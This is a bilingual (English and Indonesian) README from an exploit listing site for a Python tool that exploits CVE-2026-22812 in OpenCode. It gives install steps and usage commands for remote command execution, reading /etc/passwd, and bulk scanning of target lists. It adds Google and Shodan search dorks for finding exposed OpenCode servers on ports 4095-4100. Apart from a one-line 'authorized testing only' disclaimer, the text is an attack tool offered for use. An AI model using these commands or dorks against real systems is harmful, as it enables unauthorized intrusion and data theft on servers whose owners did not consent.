Share
## https://sploitus.com/exploit?id=030EDC99-74E3-57D6-8A46-40F9126A1AF2
README.md
OpenCode CVE-2026-22812 Exploiter
Simple Python tool to check and exploit OpenCode vulnerability (CVE-2026-22812).
Install
```bash
git clone https://github.com/yourusername/opencode-exploit.git
cd opencode-exploit
pip install requests urllib3 argparse concurrent-log-handler colorama
```
Basic Usage
```bash
# Check single target
python rce.py -u http://target:4096 --check
# Execute command
python rce.py -u http://target:4096 -c "whoami"
# Read file
python rce.py -u http://target:4096 --read-file /etc/passwd
# Scan multiple targets
python rce.py -l targets.txt --check
# Other
python rce.py --help
```
Search Dorks
Google: intitle:"OpenCode" "Login"
Shodan: port:"4095-4100" http.component:"OpenCode"
Default Ports: 4095-4100
Disclaimer
For educational/authorized testing only.
---
Indonesia
Tool Python sederhana untuk cek dan eksploit kerentanan OpenCode (CVE-2026-22812).
Instalasi:
```bash
git clone https://github.com/yourusername/opencode-exploit.git
cd opencode-exploit
pip install requests urllib3 argparse concurrent-log-handler colorama
```
Penggunaan Dasar
```bash
# Cek target tunggal
python rce.py -u http://target:4096 --check
# Eksekusi perintah
python rce.py -u http://target:4096 -c "whoami"
# Baca file
python rce.py -u http://target:4096 --read-file /etc/passwd
# Scan banyak target
python rce.py -l targets.txt --check
# Other
```
Dork Pencarian:
Google: intitle:"OpenCode" "Login"
Shodan: port:"4095-4100" http.component:"OpenCode"
Port Default: 4095-4100
Catatan:
Hanya untuk testing edukasi/terotorisasi.